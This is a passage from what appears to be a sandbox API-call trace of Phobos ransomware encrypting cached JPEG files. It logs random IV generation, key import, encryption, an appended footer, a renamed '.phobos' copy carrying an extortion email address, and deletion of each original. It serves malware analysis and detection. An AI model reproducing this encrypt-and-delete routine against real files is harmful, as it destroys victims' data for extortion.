lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0182.457] CryptDestroyKey (hKey=0xa32de8) returned 1 [0182.457] CloseHandle (hObject=0x194) returned 1 [0182.457] CloseHandle (hObject=0xb8) returned 1 [0182.457] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBC0oQi[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbc0oqi[1].jpg")) returned 1 [0182.458] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0182.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBCM2U2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbcm2u2[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.458] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=13578) returned 1 [0182.458] CloseHandle (hObject=0xb8) returned 1 [0182.458] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBCM2U2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbcm2u2[1].jpg")) returned 0x2020 [0182.459] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBCM2U2[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbcm2u2[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBCM2U2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbcm2u2[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.459] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.459] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBCM2U2[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbcm2u2[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.459] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0182.459] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.459] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x350a, lpOverlapped=0x0) returned 1 [0182.686] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3510, dwBufLen=0x3510 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3510) returned 1 [0182.686] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3510, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3510, lpOverlapped=0x0) returned 1 [0182.687] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0182.687] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.687] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0182.687] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0182.687] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0182.687] CryptDestroyKey (hKey=0xa32de8) returned 1 [0182.687] CloseHandle (hObject=0xb8) returned 1 [0182.687] CloseHandle (hObject=0x194) returned 1 [0182.688] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBCM2U2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbcm2u2[1].jpg")) returned 1 [0182.688] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0182.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDWXoC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdwxoc[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.689] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=11524) returned 1 [0182.689] CloseHandle (hObject=0x194) returned 1 [0182.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDWXoC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdwxoc[1].jpg")) returned 0x2020 [0182.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDWXoC[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdwxoc[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDWXoC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdwxoc[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.689] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.689] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDWXoC[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdwxoc[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.690] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0182.690] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.690] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2d04, lpOverlapped=0x0) returned 1 [0182.835] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2d10, dwBufLen=0x2d10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2d10) returned 1 [0182.835] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2d10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2d10, lpOverlapped=0x0) returned 1 [0182.836] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0182.836] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.836] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0182.836] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0182.836] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0182.836] CryptDestroyKey (hKey=0xa32de8) returned 1 [0182.836] CloseHandle (hObject=0x194) returned 1 [0182.836] CloseHandle (hObject=0xb8) returned 1 [0182.836] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDWXoC[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbdwxoc[1].jpg")) returned 1 [0182.837] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0182.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE3NcH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe3nch[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.838] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2147) returned 1 [0182.838] CloseHandle (hObject=0xb8) returned 1 [0182.838] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE3NcH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe3nch[1].jpg")) returned 0x2020 [0182.838] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE3NcH[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe3nch[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0182.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE3NcH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe3nch[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0182.838] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.838] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0182.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE3NcH[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe3nch[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0182.839] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0182.839] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0182.839] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x863, lpOverlapped=0x0) returned 1 [0182.999] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x870, dwBufLen=0x870 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x870) returned 1 [0182.999] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x870, lpOverlapped=0x0) returned 1 [0183.000] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0183.000] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.000] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0183.000] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0183.000] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0183.001] CryptDestroyKey (hKey=0xa32de8) returned 1 [0183.001] CloseHandle (hObject=0xb8) returned 1 [0183.001] CloseHandle (hObject=0x194) returned 1 [0183.001] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE3NcH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe3nch[1].jpg")) returned 1 [0183.002] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0183.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE8aLO[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe8alo[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0183.002] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7323) returned 1 [0183.002] CloseHandle (hObject=0x194) returned 1 [0183.002] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE8aLO[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe8alo[1].jpg")) returned 0x2020 [0183.002] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE8aLO[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe8alo[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE8aLO[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe8alo[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0183.003] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.003] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE8aLO[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe8alo[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.003] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0183.003] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.003] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1c9b, lpOverlapped=0x0) returned 1 [0183.135] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1ca0, dwBufLen=0x1ca0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1ca0) returned 1 [0183.136] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1ca0, lpOverlapped=0x0) returned 1 [0183.137] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0183.137] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0183.137] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0183.137] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0183.137] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0183.137] CryptDestroyKey (hKey=0xa32de8) returned 1 [0183.137] CloseHandle (hObject=0x194) returned 1 [0183.137] CloseHandle (hObject=0xb8) returned 1 [0183.137] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE8aLO[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbe8alo[1].jpg")) returned 1 [0183.138] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0183.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEd5bF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbed5bf[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.139] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1794) returned 1 [0183.139] CloseHandle (hObject=0xb8) returned 1 [0183.139] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEd5bF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbed5bf[1].jpg")) returned 0x2020 [0183.139] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEd5bF[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbed5bf[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEd5bF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbed5bf[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0183.139] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0183.140] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, 